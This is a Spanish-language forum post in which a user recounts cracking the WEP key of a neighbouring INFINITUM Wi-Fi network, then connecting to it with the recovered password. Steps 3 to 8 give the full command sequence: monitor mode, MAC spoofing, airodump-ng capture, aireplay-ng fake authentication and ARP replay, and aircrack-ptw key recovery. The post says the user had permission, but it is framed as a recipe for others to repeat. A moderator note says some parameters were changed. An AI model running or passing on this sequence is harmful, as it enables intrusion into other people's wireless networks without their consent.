Hola a Todos....CARAY....COMO AGRADECER SU AYUDA......DESPUES DE MUCHO BUSCAR ESTE FORO ME ABRIO LAS PUERTAS A UN MUNDO DIFERENTE y pues quiero compartir con ustedes mi experiencia.
Tengo una Tarjeta de Red Inhalambrica AWLH4130 de Airlink PCI con chip atheros y despues de imprimir y mucho releer los comentarios de este gran foro me di a la tarea de ponerlo a la practica de lo cual comento lo sigueinte
1. Efectivamente descarge el programa NetStumbler de su portal de internet y lo instale en mi maquina con Win XP SP2 y funciono sin ningun problema. en dicho programa comprobe las redes que detectaba mi Tarejeta de Red y ubico porlomenos 3 redes de INFINITUM de las cuales seleccione
la que tenía permiso para auditar con un rango de -60 Db o menor copiando su MAC (AA:BB:CC:DD:EE:FF) , su SSID (INFINITUMXXXX) y el canal en el que trabajaba (6)
2. Descarge la ultima version del WIFISLAX (La 3.1) y grabe la imagen en un CD normal para posteriormente Reiniciar mi sistema y arrancarlo en mi PC cambiando la primera Opcion del Booteo a la del CD. Funciono perfectamente y al entrar solo le di las claves de acceso Login: root y pass: toor posteriormente solo teclee startx para hacer correr el entorno de windows y empezo la aventura.
3. Abri una consola, teclee iwconfig para saber el nombre que el sistema le daba a mi tarejeta resultando ser ath0, la deshabilite con ifconfig ath0 down y segui los primeros pasos que se mencionan en este foro que son:
iwconfig ath0 rate 1M channel 6 (luego enter por aquellos que no lo intuyen)
ifconfig ath0 hw ether 00:11:22:33:44:55 (Luego enter)
airmon-ng start ath0 (luego enter)
este ultimo paso era elque me daba el error de que mi tarjeta no estaba habilitada en modo monitor. pense que talvez debia activar la tarjeta antes de ejecutar la tercera linea mencionada con el comando "ifconfig ath0 up" sin embargo el error era el mismo
checando nuevamente con iwconfig ath0 veia que aparentemente si cambiaba a 1M e inclusive la Mac pero el modo Monitor simplemente no funcionaba. solo aparecia MANAGED.
Intente hacerlo de muchas formas (inclusibe baje el otro programa que s menciona en este foro (Wifiway la ultima version para probar y nada)
Inicie nuevamente mi sistema con el wifislax y comence a observar los menus y la interfas del programa y al llegar a la esquina inferior derecha sobre el boton KDE MENU DI CLIC y despues buscando encontre lo siguiente:
kde menu>Wifislax>Asistencia de Chipset>Asistencia de chipset atheros>Modo monitor
le di a la opcion y de inmediato se abrio una consola y se desplego la informacion de que la tarjeta ya estaba ahora si en modo monitor (Casi saltaba del gusto)
4. Despues de esta aventura inicie a teclear tal cual las lineas que se describen en el manual aqui presentado que van mas o menos asi
iwconfig ath0 rate 1M channel 6 (Enter)
ifconfig ath0 hw ether 00:11:22:33:44:55 (enter)
airmon-ng start ath0 (enter)
y guala....todo funciono correctamente.
5. abri otra terminal y teclee lo siguiente
airodump-ng --bssid AA:BB:CC:DD:EE:FF -w crackinfinitum -c 6 ath0
y comenzo a capturar paquetes
6. abri otra terminal y teclee
aireplay-ng -1 6 -e INFINITUMXXXX -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 ath0
y me confirmo la autentificacion
7. abri otra terminal y teclee
areplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 ath0
no hubo mayor problema
8. ya por ultimo en la primera ventana que abri teclee Ctrl+c y escribi la siguiente linea
aircrack-ptw crackinfinitum-01.cap
y de inmediato me mando los codigos de
la red auditada 9. me sali del programa reinicie mi maquina con el sistema operativo win xp y me intente conectar con la red AUDITADA y cuando me pidio la clave de acceso pues meti la que encontre....y se hizo la luz.....si asi fue....
Gracias a todos los que ayudaron a este pobre elemento que es novato pero que aprecia su gran talento y dedicacion....
cualquier comentario escribanme ESTO ES UN FORO
----------------------------
Te he modificado unos cuantos "parámetros".... espero que no se vuelva a repetir......ok